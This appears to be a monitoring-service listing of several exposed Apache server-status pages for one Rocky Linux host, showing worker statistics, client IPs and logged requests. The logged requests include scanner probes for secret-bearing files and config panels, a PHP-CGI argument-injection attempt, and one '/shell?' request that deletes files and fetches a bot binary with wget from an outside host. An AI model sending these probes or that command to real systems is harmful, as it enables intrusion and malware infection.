136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-33938048310/23/37276_ 7.2385211168890200.00.841274.92 136.226.214.119http/1.1relehse.com:443POST /admin/documents/list-document HTTP/1.1 4-33938048310/19/37575_ 6.75866386172606130.00.671138.61 136.226.214.119http/1.1relehse.com:443POST /admin/evaluated/list-requirement HTTP/1.1 4-339</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802e3c73e30
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 11-Nov-2025 22:16:58 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 330 Parent Server MPM Generation: 329 Server uptime: 60 days 9 hours 55 minutes 56 seconds Server load: 0.58 0.44 0.29 Total accesses: 1898398 - Total Traffic: 58.9 GB - Total Duration: 1080519588 CPU Usage: u217.79 s224.36 cu10359.4 cs5842.59 - .319% CPU load .364 requests/sec - 11.8 kB/second - 32.6 kB/request - 569.174 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03561179no0yes010000 13561313no0yes010000 23561180no1yes28000 33561178no0yes010000 43561182no0yes010000 Sum501 248000 _____________________W_K__________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32935611790/179/35539_ 22.376925281677570.04.141319.71 162.158.120.157h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/163/34927_ 22.6972462433779000.02.861181.41 162.158.106.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/185/35280_ 23.0774433149641730.04.141205.82 172.68.164.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/179/35228_ 22.98580166861860.06.621238.72 172.69.35.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/167/35532_ 23.0269692155654290.04.861214.04 172.69.35.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/177/35631_ 23.0710410164062080.03.571211.80 172.70.147.142h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/194/35709_ 23.0863424232600750.03.281133.55 172.71.239.74h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/175/35153_ 23.10100148659020.06.851170.57 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 0-32935611790/181/35513_ 22.6572699158396910.03.221159.05 162.158.88.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32935611790/185/35325_ 22.4158539187190160.04.541241.33 172.69.176.9h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32935613130/785/41909_ 45.840491178466030.038.341323.56 172.71.218.253h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32935613130/843/42611_ 45.9600211212230.037.271353.41 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-32935613130/779/42216_ 45.896405206223850.051.411292.91 104.23.175.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32935613130/779/41996_ 45.921497198122650.064.451269.66 188.114.102.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32935613130/699/42715_ 45.9530176839250.034.851334.15 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-32935613130/732/43280_ 45.814493186324070.012.191259.26 104.23.175.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32935613130/710/42535_ 45.9520226096940.029.991268.91 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-32935613130/701/43019_ 45.9560179011450.016.431242.04 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-32935613130/719/41325_ 45.9540179565740.015.661172.65 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-32935613130/788/42683_ 45.9540413381790.036.351216.26 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-32935611800/331/38557_ 28.4610188919060.010.851151.17 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-32935611800/343/37621W 28.4400232242440.026.321078.69 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-32935611800/379/38329_ 28.4530253690900.05.351169.00 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-32935611801/383/37545K 28.46023178934213.838.261125.24 80.32.150.166h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32935611800/363/37794_ 28.4600151636730.021.591317.66 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-32935611800/366/38155_ 28.4400174841410.07.351130.73 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-32935611800/329/37945_ 28.4410169480130.05.351154.09 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-32935611800/352/37949_ 28.393461178846760.05.721132.73 172.69.11.176h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32935611800/337/38250_ 28.4520181034810.036.151293.24 64.23.218.208http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-32935611800/365/38124_ 28.414385209072690.06.441162.75 172.69.22.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/303/40518_ 28.551011518239212720.04.151269.91 104.23.175.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/328/39268_ 28.92979499188390520.06.111140.50 185.102.115.31http/1.1barrerasdecontencion.com:443GET /dtex1.php HTTP/1.1 3-32935611780/341/40269_ 28.591011446198599890.012.321266.14 172.68.95.140h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/317/39634_ 29.2657414248499880.07.551280.67 172.69.68.58h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/348/39651_ 28.64979446169367230.08.131200.13 185.102.115.31http/1.1 3-32935611780/317/39625_ 28.9010160177732400.030.051226.52 172.71.191.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/369/39960_ 28.5652445196544900.010.121343.87 162.158.193.175h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/358/39998_ 28.631667637276307270.05.631287.50 172.71.15.148h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/296/39266_ 28.631667518825346080.05.951251.28 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32935611780/344/40480_ 28.6652434318467580.08.181286.97 172.68.42.192h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32935611820/45/34130_ 13.132190304353200.01.241097.07 108.162.245.238h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32935611820/46/34182_ 13.741012657146169500.00.661157.54 104.23.175.16h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-32935611820/50/34295_ 13.1510120146906370.022.001197.96 108.162.245.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32935611820/41/34604_ 13.1710171161887410.00.271069.21 108.162.246.64h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32935611820/50/34061_ 13.991017116702
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a85802bd28076e
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 05-Aug-2023 16:05:03 CEST Restart Time: Tuesday, 25-Jul-2023 11:36:14 CEST Parent Server Config. Generation: 3 Parent Server MPM Generation: 2 Server uptime: 11 days 4 hours 28 minutes 49 seconds Server load: 0.00 0.03 0.05 Total accesses: 436169 - Total Traffic: 9.4 GB - Total Duration: 56913057 CPU Usage: u365.27 s369.96 cu1433.85 cs941.12 - .322% CPU load .451 requests/sec - 10.1 kB/second - 22.5 kB/request - 130.484 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01855561no2yes010011 11688152no0yes010000 21688149no0yes010000 31752401no0yes010000 41877290no2yes19010 Sum504 149021 __________________________________________W_______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-218555610/2311/6452_ 101.60318280570.041.23129.72 66.249.66.80http/1.1lcftech.es:443GET /wp-content/plugins/post-carousel-slider-for-elementor//ass 0-218555610/1960/6109_ 101.4604087931940.032.97131.30 66.249.66.80http/1.1 0-218555610/2035/6162_ 101.4516187608090.038.29124.20 164.90.222.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-218555610/2090/6413_ 101.44208093540.032.80108.72 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1691244049.64061498641967773437 0-218555610/2114/6235_ 101.62007978290.047.63129.70 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-218555610/2071/6318_ 101.61217814420.042.00138.74 66.249.66.128http/1.1lcftech.es:443GET /wp-content/uploads/elementor/css/global.css?ver=1667403582 0-218555610/2166/6342_ 101.5022127633290.047.07131.81 164.90.222.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-218555610/2007/6433_ 101.31017900700.045.88134.27 66.249.66.128http/1.1 0-218555610/2053/6251_ 101.61217383230.024.9490.28 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-218555610/2069/6251_ 101.4514587867440.033.91132.30 164.90.222.93http/1.1 1-216881520/579/11609_ 166.9795537115678850.019.03301.94 136.243.59.237http/1.1tandemsl.com:443GET /seguridad-de-producto/consultoria-cosmetica/ HTTP/1.1 1-216881520/703/11322_ 167.62955015248590.017.00281.12 191.126.37.59h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216881520/620/10949_ 167.37150920116062770.010.53216.61 191.156.248.137h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/695/11678_ 167.06188146114965360.018.01214.21 191.126.37.59h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/671/11369_ 166.98955414683130.014.31254.88 136.243.59.237http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/669/11482_ 167.0096020414011590.021.32276.59 181.32.220.170h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/750/11610_ 166.961014469540.021.26250.65 164.90.222.93http/1.1 1-216881520/590/10735_ 166.96955214188420.014.67223.70 191.126.37.59h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/689/10712_ 166.961557215269090.09.71243.80 191.156.248.137h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216881520/630/11449_ 167.07155740614153250.09.19251.91 191.156.248.137h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216881490/390/2264_ 165.4939403492540.06.9648.99 189.199.232.6h2tandemsl.com:443idle, streams: 0/33/33/0/0 (open/recv/resp/push/rst) 2-216881490/347/2062_ 165.4639603404890.04.0433.46 189.199.232.6h2tandemsl.com:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 2-216881490/436/2348_ 165.4939203739140.019.2450.73 189.199.232.6h2tandemsl.com:443idle, streams: 0/34/34/0/0 (open/recv/resp/push/rst) 2-216881490/357/2298_ 165.4939403367060.08.6835.66 189.199.232.6h2tandemsl.com:443idle, streams: 0/29/29/0/0 (open/recv/resp/push/rst) 2-216881490/614/2435_ 165.493952253785010.014.8645.07 189.199.232.6h2tandemsl.com:443idle, streams: 0/27/27/0/0 (open/recv/resp/push/rst) 2-216881490/334/2208_ 165.48003398720.010.1844.74 189.199.232.6h2tandemsl.com:443idle, streams: 0/26/26/0/0 (open/recv/resp/push/rst) 2-216881490/441/2262_ 164.7039013600140.09.6438.39 103.23.61.80http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216881490/381/2408_ 165.443903373479370.07.6164.28 189.199.232.6h2tandemsl.com:443done, streams: 0/34/34/0/0 (open/recv/resp/push/rst) 2-216881490/384/2110_ 165.4739203551010.011.0751.25 189.199.232.6h2tandemsl.com:443idle, streams: 0/25/25/0/0 (open/recv/resp/push/rst) 2-216881490/428/2081_ 165.64003353740.08.0339.41 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-217524010/1480/4674_ 146.152923876281330.031.40112.47 181.32.220.170h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-217524010/1354/4796_ 147.75005956310.020.8694.57 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-217524010/1315/4486_ 147.75006114700.036.76107.11 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-217524010/1681/4800_ 144.5728316377400.030.58115.52 13.68.170.55http/1.1 3-217524010/1416/4796_ 147.622843896560950.037.2998.31 13.68.170.55http/1.1tandemsl.com:443GET /consultoria-energia-sostenibilidad/auditorias-energeticas/ 3-217524010/1457/4762_ 147.71947336152510.021.9195.39 193.186.4.214h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-217524010/1509/5124_ 147.3729016502000.031.8891.66 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1691243345.27949500083923339843 3-217524010/1371/4610_ 146.410506536060.032.30100.32 152.231.30.135h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-217524010/1443/4860_ 147.75016059030.037.9899.89 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-217524010/1523/4953_ 146.410746564470.030.63117.78 191.156.248.137h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-218772900/1771/19176_ 85.661123723280.033.83410.19 164.90.222.93http/1.1 4-218772900/1797/19194_ 85.67130323769470.036.48428.04 164.90.222.93h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-218772900/1684/18754W 85.700023737120.026.68393.95 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-218772900/1628/19202_ 85.68121724714950.031.42449.87 164.90.222.93http/1.1 4-218772900/1840/18855_ 85.71240126268680.032.02391.02 66.249.66.37http/1.1tandemsl.com:443GET /consultoria-medioambiental/ HTTP/1.1 4-218772900/1546/19463_ 85.7812624344630.031.36489.31 66.249.66.8http/1.1lcftech.es:443GET /wp-includes/js/mediaelement/mediaelement-migrate.min.js?ve 4-218772900/1734/18866_ 85.790024146960.03
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858023f180dec
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 18-Jul-2023 02:53:36 CEST Restart Time: Friday, 14-Jul-2023 15:27:18 CEST Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 3 days 11 hours 26 minutes 17 seconds Server load: 0.09 0.07 0.02 Total accesses: 147557 - Total Traffic: 2.8 GB - Total Duration: 29120136 CPU Usage: u201.41 s135.53 cu387.33 cs236.35 - .32% CPU load .491 requests/sec - 9.6 kB/second - 19.6 kB/request - 197.348 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0887605no0yes010000 1887606no0yes010000 2956591no0yes010000 3979936no1yes010000 4887608no0yes19000 Sum501 149000 ___________________________________________W______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-38876050/244/394_ 65.5362301365540.05.145.96 109.74.204.123http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /favicon.ico HTTP/1.1 0-38876050/186/313_ 65.5276411304490.04.535.30 109.74.204.123http/1.1 0-38876050/277/416_ 65.4076401325890.06.448.25 109.74.204.123http/1.1 0-38876050/191/306_ 65.26421561163170.03.364.56 109.74.204.123http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38876050/223/435_ 65.216233551283680.03.084.94 177.245.158.233h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-38876050/225/377_ 65.5176401301320.06.4610.51 109.74.204.123http/1.1 0-38876050/239/472_ 65.78101253970.010.7112.39 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-38876050/187/305_ 65.5276401195490.08.609.89 109.74.204.123http/1.1 0-38876050/219/348_ 65.5862311189870.02.643.47 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1689640992.78533005714416503906 0-38876050/268/395_ 65.5310201329900.07.128.01 186.177.70.28h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38876060/492/792_ 79.594343872518190.010.1113.25 66.249.66.69http/1.1tandemsl.com:443GET /inundaciones-blog/barreras-de-proteccion-contra-inundacion 1-38876060/782/1051_ 78.2976402032790.012.1014.40 109.74.204.123http/1.1 1-38876060/601/900_ 79.4876402562440.09.0911.87 109.74.204.123http/1.1 1-38876060/599/882_ 79.321023152193860.08.6610.90 186.177.70.28h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38876060/609/887_ 79.2776412160150.06.7910.14 109.74.204.123http/1.1 1-38876060/546/783_ 79.4876302722080.012.1914.46 109.74.204.123http/1.1 1-38876060/592/935_ 79.74102402340.08.4712.04 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-38876060/597/892_ 79.4245142487520.010.7915.96 167.71.185.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38876060/470/710_ 79.464202190240.017.4619.71 109.74.204.123http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-38876060/509/822_ 79.484311722733070.012.5115.54 66.249.66.69http/1.1 2-39565910/1763/7119_ 94.172014034620.035.44111.71 167.71.185.75http/1.1 2-39565910/1328/7166_ 94.500014551880.034.89125.49 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-39565910/1542/7534_ 94.322615736290.036.90130.62 167.71.185.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-39565910/1675/7953_ 94.494115771680.047.06133.33 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-39565910/1552/7261_ 94.42022414424300.035.91134.63 66.249.66.69http/1.1tandemsl.com:443GET /ingenieria-hse/permisos-de-obra/seguridad-de-producto HTTP 2-39565910/1476/7217_ 94.43321815254210.049.19181.90 167.71.185.75http/1.1 2-39565910/1472/7453_ 94.203013691790.043.02158.78 167.71.185.75http/1.1 2-39565910/1578/7421_ 94.424113861790.040.75147.10 23.254.147.98http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /wp-login.php HTTP/1.1 2-39565910/1685/8022_ 94.22267114341820.043.45126.18 167.71.185.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-39565910/1741/7436_ 94.462013853500.043.64128.28 167.71.185.75http/1.1 3-39799360/59/2940_ 5.06006722720.00.7470.65 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-39799360/62/3462_ 5.00207056251920.03.7496.54 142.132.250.173h2lcftech.es:443done, streams: 0/21/21/0/1 (open/recv/resp/push/rst) 3-39799360/69/3200_ 5.00016620760.01.8971.42 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1689641590.80432295799255371093 3-39799360/88/3241_ 5.06106419690.00.6962.55 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-39799360/90/3467_ 4.97202606341590.01.1495.99 51.178.207.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-39799360/130/3336_ 5.01414016180050.01.1272.59 167.71.185.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-39799360/130/3503_ 5.02316472070.01.6266.55 167.71.185.75http/1.1 3-39799360/77/3160_ 5.03136476810.07.0678.84 142.132.250.173h2lcftech.es:443idle, streams: 0/20/20/0/1 (open/recv/resp/push/rst) 3-39799360/80/3515_ 5.06216029830.01.2593.89 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-39799360/106/3491_ 5.02346175520.01.0665.83 167.71.185.75h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-38876080/336/3026_ 72.1976414864250.05.5749.06 109.74.204.123http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-38876080/216/2736_ 72.1776404276380.02.3545.21 109.74.204.123http/1.1 4-38876080/243/2685_ 72.1776404437580.03.6957.50 109.74.204.123http/1.1 4-38876080/308/2832W 72.11004476710.06.3755.86 167.71.185.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-38876080/237/2552_ 72.117643494510490.02.6043.20 109.74.204.123http/1.1 4-38876080/293/2781_ 72.1876404770380.03.6247.80 109.74.204.123http/1.1 4-38876080/272/2774_ 72.127634124501410.07.3642.31 109.74.204.123http/1.1 4-38876080/231/2415_ 72.1776304379330.02.2238.61 109.74.204.123http/1.1 4-38876080/233/2646_ 72.1875904570490.02.4941.49 109.74.204.123http/1.1 4-38876080/248/2798_ 72.2072504485250.04.1442.07 122.189.254.232http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /shell?cd+/tmp;rm+-rf+*;wget+ testbots.maizhangyu.top/jaws; <
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b0a85802b0a858028a5da437
Apache Status Apache Server Status for 103.23.61.80 (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 28-Jun-2023 20:49:32 CEST Restart Time: Wednesday, 28-Jun-2023 18:59:25 CEST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 hour 50 minutes 6 seconds Server load: 0.13 0.04 0.01 Total accesses: 2249 - Total Traffic: 47.5 MB - Total Duration: 134989 CPU Usage: u8.52 s7.3 cu0 cs0 - .239% CPU load .34 requests/sec - 7.4 kB/second - 21.6 kB/request - 60.0218 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0845no0yes19000 1846no0yes010000 2847no0yes010000 3848no0yes010000 41202no0yes010000 Sum500 149000 __W_______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-08450/4/4_ 1.590030.00.010.01 92.191.208.80h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-08450/11/11_ 1.5936122130.03.033.03 80.29.212.67h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-08450/32/32W 1.5500320.00.190.19 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-08450/3/3_ 1.1973203420.00.010.01 190.84.180.56h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-08450/3/3_ 1.38101600.02.902.90 178.62.73.12http/1.1 0-08450/10/10_ 1.5873207540.00.080.08 186.11.9.31h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-08450/25/25_ 2.440017820.00.230.23 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-08450/14/14_ 1.3773201430.00.290.29 187.205.113.0h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-08450/9/9_ 2.4400100.00.040.04 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-08450/7/7_ 1.9573264112370.00.070.07 35.208.98.3http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/13/13_ 1.685430380.00.110.11 201.175.221.158h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-08460/10/10_ 1.275430340.00.340.34 82.145.210.192http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/10/10_ 1.2710190.00.120.12 178.62.73.12http/1.1 1-08460/11/11_ 1.89104160.00.090.09 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/9/9_ 1.2615882350.00.870.87 187.205.113.0h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-08460/10/10_ 1.2615880230.00.650.65 177.242.105.110h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/8/8_ 1.265430130.00.030.03 201.175.221.158h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/8/8_ 1.261132010960.00.090.09 92.191.208.80h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-08460/10/10_ 1.8954311711800.00.130.13 51.178.207.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-08460/16/16_ 1.8754421650.00.060.06 177.244.48.54h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-08470/33/33_ 3.654118843200.00.200.20 66.249.66.169http/1.1 2-08470/38/38_ 2.991025250.03.293.29 189.134.3.34http/1.1 2-08470/86/86_ 3.706014853260.00.710.71 45.151.167.11http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-08470/182/182_ 3.67123391120.05.315.31 178.62.73.12h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-08470/92/92_ 3.42013844030.01.531.53 178.62.73.12http/1.1 2-08470/49/49_ 3.7144127940.03.423.42 66.249.66.169http/1.1tandemsl.com:443GET /wp-content/uploads/2019/11/GHS07.gif HTTP/1.1 2-08470/57/57_ 3.075744021120.00.670.67 66.249.66.69http/1.1local goaway, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-08470/59/59_ 3.731024360.00.610.61 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-08470/92/92_ 3.705714331380.01.601.60 178.20.55.16http/1.1tandemsl.com:443POST /xmlrpc.php HTTP/1.1 2-08470/45/45_ 3.596056633150.00.520.52 80.29.212.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-08480/86/86_ 2.38824116980.00.580.58 177.244.48.54h2tandemsl.com:443done, streams: 0/57/57/0/0 (open/recv/resp/push/rst) 3-08480/31/31_ 2.72006740.00.410.41 178.62.73.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-08480/9/9_ 